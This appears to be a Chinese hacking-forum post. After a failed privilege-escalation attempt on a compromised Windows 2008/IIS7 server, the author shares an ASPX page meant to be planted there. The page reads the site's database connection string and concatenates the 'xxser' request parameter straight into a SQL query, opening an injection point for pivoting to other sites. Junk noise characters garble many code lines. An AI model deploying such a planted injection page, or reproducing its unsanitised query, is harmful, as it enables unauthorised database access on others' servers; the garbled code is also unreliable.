利用aspx构造注射来跨站

admin

昨天跟4z1看一个站点，提权很难提，看了整整5个小时，无果。 2008+iis7，无sa，无root，无各种服务。。。
其实中用到了aspx构造注射来跨站，网上找了一堆代码，没一个能用的。
代码量不多，自己写个拉倒了。烦死了。

( t" S' M3 K" C' ^0 g. I! P8 H* u) k​
% Q" \; q+ ~: B% o& C1 K1 C/ U<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4 r3 E) J1 }" a: [<html xmlns="http://www.w3.org/1999/xhtml">
0 o, k: [1 e- G, x7 s1 k# ]8 {<head runat="server">
/ M9 e! z2 e- M. y" M5 l8 T. }    <title>暗影aspx构造注射专用页面</title>
, d7 [! i% y5 i" \9 I) S/ O</head>
; h& C, @9 F7 k( e; M+ E- r<body>
& [3 y( h  M, c5 r# v$ o9 X' g' X0 k    <form id="form1" runat="server">
: X, I, v$ V/ N, p2 w( u6 j% S, M    <div>
     <script language="c#" runat="server">
5 l3 a7 y$ l# U) H            
         void page_init(object sender, EventArgs e)
         {
            
- l1 Q; y9 n& A2 S             System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
            
             conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
' ]; Z; D4 z# v             conn.Open();
: q/ @9 f' X. i3 g6 N            
             string i =  this.Page.Request.Params["xxser"];  //这里是参数?xxser=1
            
             System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
1 u: J6 v9 H1 U; u# a( K  W) T1 v+ O             int x = command.ExecuteNonQuery();
             Response.Write(i+"\n");
             Response.Write(x);
             conn.Close();
         }
8 v7 |: P4 K# R5 a7 S1 S2 |     
/ [( _; b+ {* ?9 F" B* C' A  </script>
    </div>
+ \+ g+ E0 b8 h' d9 a! |9 N& w; x    </form>
</body>
</html>